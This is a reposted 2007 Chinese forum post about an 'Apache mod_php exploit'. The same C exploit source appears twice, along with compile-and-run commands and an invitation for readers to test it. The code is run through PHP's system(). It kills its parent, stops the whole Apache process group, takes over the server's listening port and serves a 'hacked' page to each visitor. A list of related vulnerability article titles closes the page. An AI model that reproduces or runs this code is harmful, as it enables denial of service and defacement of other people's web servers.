Apache全版本存在漏洞!
2007-08-28 09:57
507 查看
国外抄来的,这个漏洞可以停止所有的Apache服务器,不知道有人发过没。也没有经过测试,有兴趣的朋友可以测试一下!E文不懂不要紧,你不知道,google知道!
-------------------------------------
下面是原文:
Hi This Exploit can Stop all apache in server then you can connect by netcat and you dont Facing any problem like this problem
Reduced: 97% of original size [ 527 x 89 ] - Click to view full image
QUOTE
/*******************************************************/
/* */
/* Apache's mod_php exploit */
/* Stops all Apache processes (except root), and */
/* listens to Apache's port */
/* */
/* Execute this via system() function of PHP */
/* */
/* Tested on: */
/* apache: 2.2.3 */
/* php: 4.4.3, 4.4.4, 5.0.4, 5.1.4, 5.1.6, 5.2.0RC5 */
/* */
/* Coded by ZERO-COLD , 17/08/07 */
/* [ tryag.com/cc ] */
/* */
/*******************************************************/
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <signal.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
char* header = "HTTP/1.1 200 OK\r\nContent-type: text/html\r\n\r\nSorry, the server is unavailable: hacked \r\n";
char tmp[1024];
int main()
{
chdir( "/" ); // do it, because it is recommended for daemons
signal( SIGCHLD, SIG_IGN ); // do not bother if a child dies
kill( getppid(), SIGKILL ); // kill parent (to avoid 'zombies')
if ( fork() ) return 0; // daemonize, and parent exit
sleep( 1 ); // wait for parent to exit (we don't want him to catch SIGSTOP)
int p = getsid( 0 ); // get current Process Group Id
setsid( ); // become session leader
kill( -p, SIGSTOP ); // good night, Apache Process Group
int sock;
struct sockaddr_in clientname;
for ( sock = 3; sock < getdtablesize(); sock++ ) // find valid socket handle
if ( listen (sock, 10) == 0 ) break;
while ( 1 )
{
int new;
unsigned size = sizeof( clientname );
new = accept( sock, (struct sockaddr *) &clientname, &size);
if (new < 0)
return 1;
if ( fork() == 0 ) // child will handle this connection, parent will listen for new connection
{
write( new, header, strlen(header) );
sprintf( tmp, "<br>You are %s : %hd\n", inet_ntoa( clientname.sin_addr ),ntohs( clientname.sin_port ));
write( new, tmp, strlen(tmp)+1 );
shutdown( new, 2 );
close( new );
return 0;
}
}
}
gcc filname.c -o filename
./filename
-------------------------------------
下面是原文:
Hi This Exploit can Stop all apache in server then you can connect by netcat and you dont Facing any problem like this problem
Reduced: 97% of original size [ 527 x 89 ] - Click to view full image
QUOTE
/*******************************************************/
/* */
/* Apache's mod_php exploit */
/* Stops all Apache processes (except root), and */
/* listens to Apache's port */
/* */
/* Execute this via system() function of PHP */
/* */
/* Tested on: */
/* apache: 2.2.3 */
/* php: 4.4.3, 4.4.4, 5.0.4, 5.1.4, 5.1.6, 5.2.0RC5 */
/* */
/* Coded by ZERO-COLD , 17/08/07 */
/* [ tryag.com/cc ] */
/* */
/*******************************************************/
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <signal.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
char* header = "HTTP/1.1 200 OK\r\nContent-type: text/html\r\n\r\nSorry, the server is unavailable: hacked \r\n";
char tmp[1024];
int main()
{
chdir( "/" ); // do it, because it is recommended for daemons
signal( SIGCHLD, SIG_IGN ); // do not bother if a child dies
kill( getppid(), SIGKILL ); // kill parent (to avoid 'zombies')
if ( fork() ) return 0; // daemonize, and parent exit
sleep( 1 ); // wait for parent to exit (we don't want him to catch SIGSTOP)
int p = getsid( 0 ); // get current Process Group Id
setsid( ); // become session leader
kill( -p, SIGSTOP ); // good night, Apache Process Group
int sock;
struct sockaddr_in clientname;
for ( sock = 3; sock < getdtablesize(); sock++ ) // find valid socket handle
if ( listen (sock, 10) == 0 ) break;
while ( 1 )
{
int new;
unsigned size = sizeof( clientname );
new = accept( sock, (struct sockaddr *) &clientname, &size);
if (new < 0)
return 1;
if ( fork() == 0 ) // child will handle this connection, parent will listen for new connection
{
write( new, header, strlen(header) );
sprintf( tmp, "<br>You are %s : %hd\n", inet_ntoa( clientname.sin_addr ),ntohs( clientname.sin_port ));
write( new, tmp, strlen(tmp)+1 );
shutdown( new, 2 );
close( new );
return 0;
}
}
}
gcc filname.c -o filename
./filename
相关文章推荐
- Firefox最新版本存在内存溢出漏洞或被攻击的可能性
- GNU wget 1.18之前版本中存在安全漏洞
- WinRAR v3.6以下版本存在安全漏洞
- 研究称所有版本Android均存在短信欺诈漏洞
- 谷歌证实Android存在欺诈漏洞:涉及所有版本
- PHPNuke所有版本EnhancedSearch文件存在注入漏洞
- Apache shiro 1.2.4版本远程命令执行漏洞详解
- Samba 4.x.x全版本存在命令执行漏洞
- 微软公司确认IE6/IE7浏览器存在新漏洞 IE8/IE5.01版本不受影响[转载]
- WordPress4.8.1版本存在XSS跨站攻击漏洞
- Apache Tomcat 信息泄露漏洞存在于所有版本
- dedecms最新版本存在远程包含漏洞--可getshell
- Android 4.2版本以下使用WebView组件addJavascriptInterface方法存在JS漏洞
- 微软已推送本月补丁 修复几乎所有Windows版本中存在的网络位置感知服务漏洞
- 360提示[高危]使用存在漏洞的JQuery版本的解决方法
- Apache Struts2 多个前缀参数远程命令执行漏洞及测试方法
- WordPress 4.9.1 正式发布!修复3.7版本以来四大漏洞!
- Struts2 高危漏洞补丁版本为: Struts 2.3.15.1
- 【转】apache近期ddos漏洞解法
- 查看apache,nginx,mysql,linux,php版本